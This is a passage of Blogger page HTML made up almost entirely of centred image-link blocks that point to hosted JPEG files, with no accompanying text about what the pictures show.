<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaH0iLTMoOp2_lYPJLtf6cV8RH5ek1NvrXWCtEZNrBmx-0QDa2ccA-_pWZzbhH-lsEAD9tUEmX_CD5KxItmY2RQxkp0u3FriEPVxcvciGPVcAMNz-QTFI8xHoTOBcDFsguGLqrxrHLChQ/s1600/0004.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="447" data-original-width="425" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaH0iLTMoOp2_lYPJLtf6cV8RH5ek1NvrXWCtEZNrBmx-0QDa2ccA-_pWZzbhH-lsEAD9tUEmX_CD5KxItmY2RQxkp0u3FriEPVxcvciGPVcAMNz-QTFI8xHoTOBcDFsguGLqrxrHLChQ/s320/0004.jpg" width="304" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAzdQPT7mjOPGEB1vpOp4w-zJ37_NLeMHoSonYEoSq-IePUZ5vJK8q6-363kndHN50OFJRS47I-lO-7NJEtMSGIR_En_qpmkXVOjazPWxJShC7b5saIJqEDNi0ut_I7SzG5z-hkNhe5A/s1600/0003.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="622" data-original-width="622" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitAzdQPT7mjOPGEB1vpOp4w-zJ37_NLeMHoSonYEoSq-IePUZ5vJK8q6-363kndHN50OFJRS47I-lO-7NJEtMSGIR_En_qpmkXVOjazPWxJShC7b5saIJqEDNi0ut_I7SzG5z-hkNhe5A/s320/0003.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsH2oTo9X6WZJqToDCNfGrU6WWVm0fE-3w-dvcRfvFAcjktxpFutLlsrwcBdEB8CsMvu0Rbr-hQ9kd67FXtn_l7TatSiV9tE-h5AitrFeNmua5oTVzZrBtnsHTzEA1yQp_Rqm1_AQdEVo/s1600/z9qIF65SjBgdD.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsH2oTo9X6WZJqToDCNfGrU6WWVm0fE-3w-dvcRfvFAcjktxpFutLlsrwcBdEB8CsMvu0Rbr-hQ9kd67FXtn_l7TatSiV9tE-h5AitrFeNmua5oTVzZrBtnsHTzEA1yQp_Rqm1_AQdEVo/s320/z9qIF65SjBgdD.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWzl2tp7SMTDmpLgBxbmCQ-o60nsQrMnPK-34H1LakVzTtXKaXKzCjhMzSGvaJAcFyrF_VQzz1GpWDvplALA8ORXrLaCO4IvvOOTm3TGRKKdchq8wYhOSnhf1JyzQPGJk7rZOOAosnhB0/s1600/z9qIF65SjBgdD.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWzl2tp7SMTDmpLgBxbmCQ-o60nsQrMnPK-34H1LakVzTtXKaXKzCjhMzSGvaJAcFyrF_VQzz1GpWDvplALA8ORXrLaCO4IvvOOTm3TGRKKdchq8wYhOSnhf1JyzQPGJk7rZOOAosnhB0/s320/z9qIF65SjBgdD.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBiS37c8k2wZuCUULBEwQkcjQq9YBZW1C_sf3qhIXUpntkIbybfPb_2uX4DBVdVQ0-qYwRhLU-HHz_67PLCsRf8q9DeJmD4wyk8qypUFiLHJAi8BEf29pMZ-BNGMJ4ThAVwwVCKQIGcZQ/s1600/yA4gKtr3.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBiS37c8k2wZuCUULBEwQkcjQq9YBZW1C_sf3qhIXUpntkIbybfPb_2uX4DBVdVQ0-qYwRhLU-HHz_67PLCsRf8q9DeJmD4wyk8qypUFiLHJAi8BEf29pMZ-BNGMJ4ThAVwwVCKQIGcZQ/s320/yA4gKtr3.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJRihbS8_TCh2Qvfn_DIrERwZmW1SnPiPbymI3wRelIMv1dwW8Sr22IjUBdGvD9Ijbv03OrNqdqwe_g637Cyyd3Nv1hLh4Ec5DND5Sh8_AP7W-MTqe7QUSd2amSflxxoe37-St3VTtQs/s1600/yA4gKtr9.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLJRihbS8_TCh2Qvfn_DIrERwZmW1SnPiPbymI3wRelIMv1dwW8Sr22IjUBdGvD9Ijbv03OrNqdqwe_g637Cyyd3Nv1hLh4Ec5DND5Sh8_AP7W-MTqe7QUSd2amSflxxoe37-St3VTtQs/s320/yA4gKtr9.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOV5ePStw_uGonKq4cctYCZjXBsKbwyE6P8ONEVmwXvcd9uKLiJD6xrfjZuGe550Byx71jmhyQHjTNTAw5PP3LVqT8J1gUtFa05A4Wkx64IdUeGq2btprFCdBeK5hSMRwd2WkNOAS2y_0/s1600/yA4gKtr.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOV5ePStw_uGonKq4cctYCZjXBsKbwyE6P8ONEVmwXvcd9uKLiJD6xrfjZuGe550Byx71jmhyQHjTNTAw5PP3LVqT8J1gUtFa05A4Wkx64IdUeGq2btprFCdBeK5hSMRwd2WkNOAS2y_0/s320/yA4gKtr.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7W2Skm6f5TXrjEXqbMeSZE2FgTg5Ef7GtKsdOraixexFOxCSkXl5uNNLh70prrosUWlKmYmO40SmUt_BbW35MCV7UehpI0hVisLmaxNc5H3asmZWNea-d5ZtsBP7PBdzFJupb6VGVDc/s1600/yA4gKtr5.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7W2Skm6f5TXrjEXqbMeSZE2FgTg5Ef7GtKsdOraixexFOxCSkXl5uNNLh70prrosUWlKmYmO40SmUt_BbW35MCV7UehpI0hVisLmaxNc5H3asmZWNea-d5ZtsBP7PBdzFJupb6VGVDc/s320/yA4gKtr5.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioynVU1ksNuLFL5AsAKy_IiEdS0RU8wLwccudb_hOV7sejSoT-DBluOQ78O6qwwjUvxOJxvK8AY8WK5fZ03OCRCmIWXLBTZkGs2JVtfBkFwuUE5RcIOq_lpfyPDRzirdOAUQA4gsui9iY/s1600/yA4gKtr5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioynVU1ksNuLFL5AsAKy_IiEdS0RU8wLwccudb_hOV7sejSoT-DBluOQ78O6qwwjUvxOJxvK8AY8WK5fZ03OCRCmIWXLBTZkGs2JVtfBkFwuUE5RcIOq_lpfyPDRzirdOAUQA4gsui9iY/s320/yA4gKtr5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIyH_iTyaWq-xDzkT02668Efh4q0iDI2eRc-O67aJymm46By44KNOJupzD8CTA10owuMT79X0ujF6rBqsmJcbSXrQTSUJ1y51fPnT6zk_gDwqVVB9Tso38ppAAhNXiBdHbmaMMVp74MlI/s1600/yA4gKtr7.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIyH_iTyaWq-xDzkT02668Efh4q0iDI2eRc-O67aJymm46By44KNOJupzD8CTA10owuMT79X0ujF6rBqsmJcbSXrQTSUJ1y51fPnT6zk_gDwqVVB9Tso38ppAAhNXiBdHbmaMMVp74MlI/s320/yA4gKtr7.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJbupFzlz21M4tP9im4UBHwRbVpDa9jFrg0kX_mmE-1oSgctfvalLOZxUHHGFCrW0P7sGgGSw07uddItP7zzDRfzfRkNJzVkDRBELiF9eKCUdXSzzpPGUx7iYlC5sBo59I9ertD63qzw/s1600/yA4gKtr7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJbupFzlz21M4tP9im4UBHwRbVpDa9jFrg0kX_mmE-1oSgctfvalLOZxUHHGFCrW0P7sGgGSw07uddItP7zzDRfzfRkNJzVkDRBELiF9eKCUdXSzzpPGUx7iYlC5sBo59I9ertD63qzw/s320/yA4gKtr7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7mvscGFFasqlGpSJZPTUiTQDleNTk05gkMaDBYSUdyvoBiDbwuj24kIOKqadSNH45h4mMQFXQHGFpZi6deT-7guso68FKmC7XiWbeeJE6gj5Pg9il5F-yAtV3sLOSufVE5_aOMn6PerA/s1600/yA4gKtr9.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7mvscGFFasqlGpSJZPTUiTQDleNTk05gkMaDBYSUdyvoBiDbwuj24kIOKqadSNH45h4mMQFXQHGFpZi6deT-7guso68FKmC7XiWbeeJE6gj5Pg9il5F-yAtV3sLOSufVE5_aOMn6PerA/s320/yA4gKtr9.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN2r8Am6JYj780LOh2v7WiQktIpzjhzsVfHIO014r8f1BqtwQe92bGLC64SbJ_9dzGsesqc8H-FBbKtlpYfVuiUapkadUYsXWvd7nm3YiRhn_fdY23MfF-XUC-Wqm-LL1Zmm7FH2RpSaE/s1600/yA4gKtr1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN2r8Am6JYj780LOh2v7WiQktIpzjhzsVfHIO014r8f1BqtwQe92bGLC64SbJ_9dzGsesqc8H-FBbKtlpYfVuiUapkadUYsXWvd7nm3YiRhn_fdY23MfF-XUC-Wqm-LL1Zmm7FH2RpSaE/s320/yA4gKtr1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVh1q0jeAAIUFVup5IA1bjN4f-QISUcipK8NC_flER6jntDnQ3cjb_tVJ4cidBzcDUG7bOFW8VVEwmD-WTycE_OkuKbjyu7ovLyB56NFID2NJn6qXxbcV3Ix7wvrJR0dU8qxX-NWIESU/s1600/Xc3Lqnw8aW5MM7v.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVh1q0jeAAIUFVup5IA1bjN4f-QISUcipK8NC_flER6jntDnQ3cjb_tVJ4cidBzcDUG7bOFW8VVEwmD-WTycE_OkuKbjyu7ovLyB56NFID2NJn6qXxbcV3Ix7wvrJR0dU8qxX-NWIESU/s320/Xc3Lqnw8aW5MM7v.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVobnoP3jsLuCIL-C4MP7Ovv7yGl4UvoSkiKSoDFiAJuF39-oobREtmDGjHa6JhfaDdOUWkBnfNF1kPISqL60kr-hQfvKJyWqmKwVdYgmRZBRtNeD-zUs8pP4AGm92ySU0Efr6ABaFQSU/s1600/Xc3Lqnw8aW5MM7v.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVobnoP3jsLuCIL-C4MP7Ovv7yGl4UvoSkiKSoDFiAJuF39-oobREtmDGjHa6JhfaDdOUWkBnfNF1kPISqL60kr-hQfvKJyWqmKwVdYgmRZBRtNeD-zUs8pP4AGm92ySU0Efr6ABaFQSU/s320/Xc3Lqnw8aW5MM7v.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrPSn3tXtDDHjRua3H64kLstmDKngydJ4P0byOQxVEmPfnvQkuoJsD07W0SZOSxK0pAkD42Cpd_qvu5-n2aC_-Rz72xEi5JAmss8YwUL6R2eXl71OuQiAAfOxM-vWF2steRlL657TcGJE/s1600/VZIgbUuN.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrPSn3tXtDDHjRua3H64kLstmDKngydJ4P0byOQxVEmPfnvQkuoJsD07W0SZOSxK0pAkD42Cpd_qvu5-n2aC_-Rz72xEi5JAmss8YwUL6R2eXl71OuQiAAfOxM-vWF2steRlL657TcGJE/s320/VZIgbUuN.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2oa489fY-ZFEZWoxFhiJXUdrvlw04aJntL7ikKpT8irKn_Bh_FQkHwyL49wtk4pwzfmVXK5aPa30J9hCyUsbeUCzQShJN0wyZnCp2irlB4X7mgYJIJYCmiwk1fFc8zUvHjXBMh5Mzhc/s1600/VZIgbUuN.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2oa489fY-ZFEZWoxFhiJXUdrvlw04aJntL7ikKpT8irKn_Bh_FQkHwyL49wtk4pwzfmVXK5aPa30J9hCyUsbeUCzQShJN0wyZnCp2irlB4X7mgYJIJYCmiwk1fFc8zUvHjXBMh5Mzhc/s320/VZIgbUuN.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc1u5KzkfKlcTZ8KlYFL7D2L9Z8APU1IUYmCGN7UMqnN_dVJCINWGa6ilhUBbQ51uarB5cLRZwWP9CgNDCT133mDbdEWhCo086wV1_Ad-QWhbOZeUZ7Wu3VOZvB-jq5JakWYvSQ-BCuKc/s1600/VbswDahFVWnGo4W.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc1u5KzkfKlcTZ8KlYFL7D2L9Z8APU1IUYmCGN7UMqnN_dVJCINWGa6ilhUBbQ51uarB5cLRZwWP9CgNDCT133mDbdEWhCo086wV1_Ad-QWhbOZeUZ7Wu3VOZvB-jq5JakWYvSQ-BCuKc/s320/VbswDahFVWnGo4W.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiybKOFXaGI8ic2iMfokuwiMb261XJogYpDyZpv25ZezPkGofaNdkL-7YtV2Xgw9nkE6KZJiHQqN3_wn5Wsrg8_X2MJN-z6Xv4XsdwJlM1etOduGgIvXGlPfDTWFb2u5L9myMppQgE2Sfs/s1600/owJQBwpX.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiybKOFXaGI8ic2iMfokuwiMb261XJogYpDyZpv25ZezPkGofaNdkL-7YtV2Xgw9nkE6KZJiHQqN3_wn5Wsrg8_X2MJN-z6Xv4XsdwJlM1etOduGgIvXGlPfDTWFb2u5L9myMppQgE2Sfs/s320/owJQBwpX.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp3VXHGDZy_mOjQaUzP9OPSI-Ng12dll7o7ROUw_sahAlXEqekT3kfUfjcpsxAC0gcfUJebiF8_Kv_gligtJx1dUfYf3WucJHQsU5xzb3zyFnfbzLrUsF3XAM6uS8EocaTmb84uL3PT0/s1600/owJQBwpX.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp3VXHGDZy_mOjQaUzP9OPSI-Ng12dll7o7ROUw_sahAlXEqekT3kfUfjcpsxAC0gcfUJebiF8_Kv_gligtJx1dUfYf3WucJHQsU5xzb3zyFnfbzLrUsF3XAM6uS8EocaTmb84uL3PT0/s320/owJQBwpX.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFItZKxAXuX4-gWynA-DXJVnl8gzLSUEk333KV6Ib694Ud1jqPmQaCRY1_ZzfU1YpK-4q9DPHWVOjFkJjBVdrXdbe2dn-f2aODCXAZga_4QGI1CLOYJub5VkhsYh6X-OSMQ-pMUOA-yU/s1600/s1y0ikn79G3UmS5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFItZKxAXuX4-gWynA-DXJVnl8gzLSUEk333KV6Ib694Ud1jqPmQaCRY1_ZzfU1YpK-4q9DPHWVOjFkJjBVdrXdbe2dn-f2aODCXAZga_4QGI1CLOYJub5VkhsYh6X-OSMQ-pMUOA-yU/s320/s1y0ikn79G3UmS5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jNdRFhJh5YdhJRUKMQAw7d4WdpUKEVtbsbQ_l5QqKx7rPlL1LUMRYzwFhlbV0tsP6xx9XzPxDuV8oBLesWRlRu59aFWwkyxETUqFRymf3yQdh9iAKGfyzsw2wFcF2L7kW1uymrEgx1s/s1600/TWNeiU8aq.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jNdRFhJh5YdhJRUKMQAw7d4WdpUKEVtbsbQ_l5QqKx7rPlL1LUMRYzwFhlbV0tsP6xx9XzPxDuV8oBLesWRlRu59aFWwkyxETUqFRymf3yQdh9iAKGfyzsw2wFcF2L7kW1uymrEgx1s/s320/TWNeiU8aq.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAC77gLXwlGDHHE1Gd927uZ8QJkElsF1hAPTpMeOaJJqOgmLp2Zh7Ibh34XcarbISpNBh2yJK-Zb11K2ISSc4-9I9_RTgvjLO-1wF8xkFMpEX7blL4IYWiXTUNvCQ6-ayoTYnQnPXHsLw/s1600/VbswDahFVWnGo4W.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAC77gLXwlGDHHE1Gd927uZ8QJkElsF1hAPTpMeOaJJqOgmLp2Zh7Ibh34XcarbISpNBh2yJK-Zb11K2ISSc4-9I9_RTgvjLO-1wF8xkFMpEX7blL4IYWiXTUNvCQ6-ayoTYnQnPXHsLw/s320/VbswDahFVWnGo4W.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IKekLGpfUoNyFlPHwhGKNRGxcN8W6z71hZkkG3z3Nj1OAOXABVrCAyzvzMKYKafPA7t65_kM5tvNhbWMfAT9twSlNKn7EZr7oWFJBcRZJj751LaDZUv6jWg96CZ5l3ivPQtpzmaK45k/s1600/SWsK8y8cKX2Bha.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IKekLGpfUoNyFlPHwhGKNRGxcN8W6z71hZkkG3z3Nj1OAOXABVrCAyzvzMKYKafPA7t65_kM5tvNhbWMfAT9twSlNKn7EZr7oWFJBcRZJj751LaDZUv6jWg96CZ5l3ivPQtpzmaK45k/s320/SWsK8y8cKX2Bha.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW3RiT4TpD7F8MV0tN7fQ3sW37Lv0hQepUNl5tEsXsDqxhbI0yPo5xcyPlIYUNaDVdrCkk0lpH3cvHCGn8y7t4DXKnOI8rQRksCDYZEx04euPLpZuhlm4mkdKxnZ-KHLN495gOS030mas/s1600/OTPCJIMquMN.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW3RiT4TpD7F8MV0tN7fQ3sW37Lv0hQepUNl5tEsXsDqxhbI0yPo5xcyPlIYUNaDVdrCkk0lpH3cvHCGn8y7t4DXKnOI8rQRksCDYZEx04euPLpZuhlm4mkdKxnZ-KHLN495gOS030mas/s320/OTPCJIMquMN.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1wyCbywoAMoehbufyRC89W4vaWqAlJId_I8NV-S6MBx6VoxaCQLwh68okGg-ViH2qMB3O71lzmkO8BsWOmZgM_f0N7TJoRWm0yHOtFoK5MU27oAY113GXMysnvsMme5XTmtmnJZUOiA/s1600/OTPCJIMquMN.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1wyCbywoAMoehbufyRC89W4vaWqAlJId_I8NV-S6MBx6VoxaCQLwh68okGg-ViH2qMB3O71lzmkO8BsWOmZgM_f0N7TJoRWm0yHOtFoK5MU27oAY113GXMysnvsMme5XTmtmnJZUOiA/s320/OTPCJIMquMN.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGt0TgVufmPTc8QNw53CULu3o-Oddx4RywAnNt4Lfl7H2zeMNEXopJL9bUKhyXgGAG1Rz6uoTaS7lrrLsm5vddQNe5chJ5r3qARogVsmCL4gSBLyx6bv7Xxko7WyIxC7L6PnNnWqNMX0Y/s1600/ORv4Ucb3VAhz795.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGt0TgVufmPTc8QNw53CULu3o-Oddx4RywAnNt4Lfl7H2zeMNEXopJL9bUKhyXgGAG1Rz6uoTaS7lrrLsm5vddQNe5chJ5r3qARogVsmCL4gSBLyx6bv7Xxko7WyIxC7L6PnNnWqNMX0Y/s320/ORv4Ucb3VAhz795.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6C1cUwDCV3elpivRdq313aHoeDNsTGLzISZdpezhqo6BtuAxwIc2hA8py-h5swSQErNltReuaHJqnSwnJ8HsTIzvfGyyZ_9PndTLgk9RNtrlyrhp27lNjZ0qyIjOuThikuvZ4NS9CnQ/s1600/ORv4Ucb3VAhz796.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6C1cUwDCV3elpivRdq313aHoeDNsTGLzISZdpezhqo6BtuAxwIc2hA8py-h5swSQErNltReuaHJqnSwnJ8HsTIzvfGyyZ_9PndTLgk9RNtrlyrhp27lNjZ0qyIjOuThikuvZ4NS9CnQ/s320/ORv4Ucb3VAhz796.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxVA7RwUCwNfO3tH6sagGdeHt5YQ_aifu9eoz4ft8fOJbko7WiNqFRUhOSu91Uglb9d5ny8qQ7RURgOv0uOFhfLEJ-b4BHsYOUU8nM-uyYpLMa4mujeRJQFj1UB86J8kK5gMgC255Wsw/s1600/ORv4Ucb3VAhz793.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxVA7RwUCwNfO3tH6sagGdeHt5YQ_aifu9eoz4ft8fOJbko7WiNqFRUhOSu91Uglb9d5ny8qQ7RURgOv0uOFhfLEJ-b4BHsYOUU8nM-uyYpLMa4mujeRJQFj1UB86J8kK5gMgC255Wsw/s320/ORv4Ucb3VAhz793.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu2dbNFMTKF4abLM4dzJ6X_ElHZdBcGX_o68xRWPyq3qPlwbhkm_Yn9BBLcgGhd7wAfr-G_mLBdDrlOsOkbqB481j07DXNlAMqvrnElJmhPFBf2J3rrO1f4gW9bxdNHbreJOE9C9YUpDw/s1600/ORv4Ucb3VAhz791.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu2dbNFMTKF4abLM4dzJ6X_ElHZdBcGX_o68xRWPyq3qPlwbhkm_Yn9BBLcgGhd7wAfr-G_mLBdDrlOsOkbqB481j07DXNlAMqvrnElJmhPFBf2J3rrO1f4gW9bxdNHbreJOE9C9YUpDw/s320/ORv4Ucb3VAhz791.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
